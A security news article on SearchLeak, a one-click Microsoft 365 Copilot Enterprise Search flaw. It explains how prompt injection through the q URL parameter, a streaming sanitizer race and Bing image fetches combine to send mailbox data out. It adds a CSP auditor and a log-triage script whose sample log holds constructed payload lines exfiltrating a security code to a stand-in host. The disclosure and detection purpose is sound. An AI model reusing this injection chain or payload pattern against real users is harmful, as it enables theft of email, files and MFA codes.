One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
Microsoft 365 Copilot flaw allowed data exfiltration via a single click on a trusted link.
Summary
Researchers discovered a critical vulnerability in Microsoft 365 Copilot Enterprise Search, dubbed SearchLeak, which allowed attackers to steal emails, files, and MFA codes with a single click. The flaw chained three bugs, exploiting a parameter-to-prompt injection and leveraging Bing's image search as an exfiltration proxy, bypassing traditional security measures. Microsoft has mitigated the issue on its backend.
Full text
Swati Khandelwal, Jun 15, 2026. Vulnerability / Enterprise Security

A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search. Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak. Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were unlikely to flag it. No prompt, no password, no second click.

Microsoft assigned CVE-2026-42824 and marked it critical; the CVSS scores ran lower and disagreed, 6.5 from Microsoft and 7.5 from the National Vulnerability Database. The company mitigated the flaw on its backend, so customers have nothing to worry about, and Varonis presented a proof-of-concept, not observed exploitation.

Three bugs, one click

Microsoft's advisory describes the flaw as a command injection that can expose information over a network. In practice, SearchLeak stacks one AI-specific weakness on two old web bugs, and each link in the chain is needed for the next.

The entry point is the q parameter in the Copilot Enterprise Search URL. It is meant for a natural-language query, but Copilot reads whatever sits there as instructions, not just a search string. Varonis calls this Parameter-to-Prompt injection. An attacker writes a URL that tells Copilot to search the mailbox, take an email title, and place it inside an image URL. The victim types nothing. They click, and Copilot does the work.

Next is a race condition in how the response renders. Microsoft's guardrail wraps Copilot output in <code> blocks so the browser treats markup as text. The catch is timing: the wrapping happens after Copilot finishes generating, but the browser renders the stream as it arrives. The injected <img> tag is drawn and fires its request before the sanitizer runs.
By the time the output is neutralized, the request has already left.

The last link gets the data past the page's Content Security Policy. The CSP on m365.cloud.microsoft blocks images from arbitrary domains, but it allowlists *.bing.com. Bing's "Search by Image" endpoint accepts an image URL and fetches it server-side to analyze it. Point that fetch at an attacker's server with the stolen text encoded in the path, and Bing retrieves it. The browser's CSP never applies, because the request comes from Bing's infrastructure. Bing becomes the exfiltration proxy. The CSP allowlist does the hiding.

Put together: the victim clicks, Copilot searches their data, the response embeds a value like an email subject in a Bing image URL, the browser calls Bing during streaming, and Bing pulls the attacker's URL. The attacker reads it off their own logs, for example, a request for /Your_Security_Code_847291/img.png.

What an attacker gets

Copilot Enterprise can reach whatever the signed-in user can, through their Microsoft Graph access, and the attacker inherits that reach without ever logging in. The most time-sensitive prize sits in the inbox: one-time codes, MFA codes, and password-reset links, often still valid for a few minutes. A script that lifts those off a log while the window is open can take over an account before anyone notices. The same access also reaches calendar invites, meeting notes, and any SharePoint or OneDrive file Copilot has indexed, where the salary data, earnings figures, and acquisition plans live.

SearchLeak is the second time Varonis has shown this pattern. Varonis researcher Dolev Taler demonstrated the same one-click technique in an earlier Reprompt attack against Copilot Personal, and it held up against Enterprise Search despite the extra guardrails that tier is supposed to enforce. The same pattern showed up in EchoLeak (CVE-2025-32711), the zero-click Copilot data-leak bug Aim Security disclosed in 2025.
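The third link in the chain is a CSP allowlist that happens to include a host with a server-side fetch feature. The audit below is an added example, not Microsoft's or Varonis's code, and it generalizes the lesson to any web application's own policy: parse the header, resolve which sources actually govern images, and flag wildcard hosts and hosts known to fetch caller-supplied URLs. The only facts taken from the article are that m365.cloud.microsoft allowlisted *.bing.com and that Bing's "Search by Image" fetches a supplied URL server-side; the endpoint's hostname (www.bing.com), the FETCH_PROXY_HOSTS list, and both sample policies are assumptions.

```python
"""Audit a Content-Security-Policy for image sources that can be turned into a
server-side fetch proxy, the third link in the SearchLeak chain.

Added example, not Microsoft's or Varonis's code. The proxy host list and the
sample policies are constructed for illustration.
"""
from urllib.parse import urlsplit

# Hosts known to fetch a caller-supplied URL on the server side. Constructed;
# a defender maintains this from their own review. The hostname for Bing's
# "Search by Image" endpoint is an assumption.
FETCH_PROXY_HOSTS = {"www.bing.com"}

# Source expressions that allow an entire scheme or any origin at all.
BROAD_SOURCES = {"*", "http:", "https:", "data:", "blob:"}


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split "a b c; d e" into {"a": ["b", "c"], "d": ["e"]}.

    Directive names are lowercased; a repeated directive keeps its first
    occurrence, which is how browsers treat duplicates."""
    directives: dict[str, list[str]] = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def img_sources(csp: dict[str, list[str]]) -> list[str]:
    """img-src falls back to default-src when it is not set explicitly."""
    return csp.get("img-src", csp.get("default-src", []))


def host_of(source: str) -> str:
    """'https://*.bing.com:443/images' -> '*.bing.com'; keyword sources -> ''."""
    if source.startswith("'"):            # 'self', 'none', 'nonce-...'
        return ""
    s = source if "://" in source else "//" + source
    try:
        return (urlsplit(s).hostname or "").lower()
    except ValueError:
        return ""


def source_allows(source_host: str, host: str) -> bool:
    """CSP host matching: '*.example.com' covers subdomains, not the apex."""
    if source_host.startswith("*."):
        return host.endswith(source_host[1:])
    return host == source_host


def audit_img_src(header: str) -> list[tuple[str, str]]:
    """Return (source, reason) pairs for img-src entries worth a second look."""
    findings = []
    for src in img_sources(parse_csp(header)):
        low = src.lower()
        if low in BROAD_SOURCES:
            findings.append((src, "scheme-wide or any-origin source"))
            continue
        host = host_of(low)
        if not host:
            continue
        if host.startswith("*."):
            findings.append((src, "wildcard host: every present and future subdomain is trusted"))
        for proxy in sorted(FETCH_PROXY_HOSTS):
            if source_allows(host, proxy):
                findings.append((src, f"allows {proxy}, which fetches caller-supplied URLs server-side"))
    return findings


# Constructed policies: the first mirrors the weakness the article describes,
# the second names only the one static host the page actually needs.
WEAK_CSP = "default-src 'self'; img-src 'self' https://*.bing.com data:"
TIGHT_CSP = "default-src 'self'; img-src 'self' https://static.example.com"

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_CSP), ("tight", TIGHT_CSP)):
        print(name, audit_img_src(policy) or "no findings")
```

The wildcard finding matters on its own: even without a known fetch proxy today, `*.bing.com` trusts every subdomain that host family adds later, and the fix is to name the specific hosts the page loads images from.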
SSRF and sanitizer races are old bug classes; the prompt injection is the new part, and it makes them reachable again.

Microsoft mitigated the flaw on its backend, and because Copilot Enterprise is a managed service, tenant admins cannot patch or reconfigure the parts that failed. What they can do is watch and contain. Look for Copilot Search URLs carrying encoded payloads or HTML in the q parameter, and for unusual outbound requests to Bing's image endpoints. Tighten data-access governance so Copilot indexes less, which shrinks what any future leak can reach.
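The two log signals the article tells tenant admins to watch for can be turned into a triage script. The one below is an added example, not code from Varonis, Microsoft or The Hacker News: it parses proxy log lines, flags Copilot Enterprise Search URLs whose q parameter carries markup, an embedded URL or a second layer of percent-encoding, flags Bing image-search requests that carry an outside URL, and then pairs the two when the same user produces both within a short window, which is the order the chain runs in (the browser calls Bing while the response is still streaming). Assumptions: the log line format, the /search path on m365.cloud.microsoft, and the layout of Bing's image-search URL (the imgurl parameter). The sample lines are constructed, and the only page value they reuse is the example exfiltration path /Your_Security_Code_847291/img.png. These are triage signals for an analyst, not verdicts; a user legitimately pasting a URL into Bing's image search will also trip the second check.

```python
"""Triage web-proxy logs for the two signals the article recommends watching:
Copilot Enterprise Search URLs with a payload in q, and Bing image-search
requests carrying a third-party URL.

Added example, not code from Varonis or Microsoft. The log format, the
Copilot /search path and the Bing imgurl parameter are assumptions; the
sample log lines at the bottom are constructed.
"""
import re
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit

COPILOT_HOST = "m365.cloud.microsoft"   # named in the article
BING_IMAGE_PREFIX = "/images/"          # assumed path prefix of Bing image search

LOG_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) (?P<method>GET|POST) (?P<url>\S+) (?P<status>\d{3})$")
TAG_RE = re.compile(r"</?[a-z][a-z0-9-]*(\s[^>]*)?>", re.I)   # <img ...>, <a ...>
MD_IMG_RE = re.compile(r"!\[[^\]]*\]\([^)]*\)")                # ![alt](url)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)


def inspect_url(url: str) -> tuple[list[str], list[str]]:
    """Return (reasons, embedded_urls); empty reasons means nothing to triage."""
    reasons: list[str] = []
    urls: list[str] = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    params = parse_qs(parts.query, keep_blank_values=True)   # decodes one layer
    if host == COPILOT_HOST:
        for q in params.get("q", []):
            if unquote(q) != q:               # a second encoding layer survived
                reasons.append("multiply percent-encoded q")
            text = unquote(unquote(q))        # look at the fully decoded query
            if TAG_RE.search(text) or MD_IMG_RE.search(text):
                reasons.append("html/markdown markup in q")
            found = URL_RE.findall(text)
            if found:
                reasons.append("URL embedded in q")
                urls.extend(found)
    elif host == "bing.com" or host.endswith(".bing.com"):
        if parts.path.startswith(BING_IMAGE_PREFIX):
            for values in params.values():
                for v in values:
                    urls.extend(URL_RE.findall(unquote(v)))
            if urls:
                reasons.append("third-party URL passed to Bing image endpoint")
    return reasons, urls


def parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def scan_log(lines) -> list[dict]:
    """One finding per suspicious line: ts, user, url, reasons, urls."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        reasons, urls = inspect_url(m["url"])
        if reasons:
            findings.append({"ts": parse_ts(m["ts"]), "user": m["user"],
                             "url": m["url"], "reasons": reasons, "urls": urls})
    return findings


def correlate(findings: list[dict], window_seconds: int = 30) -> list[tuple[str, str]]:
    """Pair a flagged Copilot Search hit with a flagged Bing image hit from the
    same user inside the window. The chain fires Bing during streaming, so a
    real hit lands seconds after the Copilot request."""
    copilot = [f for f in findings if urlsplit(f["url"]).hostname == COPILOT_HOST]
    bing = [f for f in findings if urlsplit(f["url"]).hostname != COPILOT_HOST]
    pairs = []
    for c in copilot:
        for b in bing:
            delta = (b["ts"] - c["ts"]).total_seconds()
            if b["user"] == c["user"] and 0 <= delta <= window_seconds:
                pairs.append((c["url"], b["url"]))
    return pairs


# Constructed sample lines (not real telemetry). Line 2 carries a double-encoded
# <img> tag in q; line 3 is the same user reaching Bing image search one second
# later with an outside URL in the style the article describes.
SAMPLE_LOG = [
    "2026-06-15T10:02:05Z user=alice GET https://m365.cloud.microsoft/search?q=quarterly%20budget%20deck 200",
    "2026-06-15T10:02:11Z user=alice GET https://m365.cloud.microsoft/search?q=find%2520my%2520travel%2520plan%2520%253Cimg%2520src%253D%2522https%253A%252F%252Fexample.invalid%252Fx.png%2522%253E 200",
    "2026-06-15T10:02:12Z user=alice GET https://www.bing.com/images/search?view=detailv2&iss=sbi&imgurl=https%3A%2F%2Fexample.invalid%2FYour_Security_Code_847291%2Fimg.png 200",
    "2026-06-15T10:03:40Z user=bob GET https://www.bing.com/search?q=copilot+search+tips 200",
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f["ts"].isoformat(), f["user"], f["reasons"], f["urls"])
    for c, b in correlate(hits):
        print("chain:", c, "->", b)
```

The correlation step is what lifts this above a keyword match: either line alone has a benign explanation, but a decoded markup payload in a Copilot query followed within seconds by the same user's browser handing Bing an unfamiliar URL is the exact sequence the article lays out.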
Indicators of Compromise
- cve — CVE-2026-42824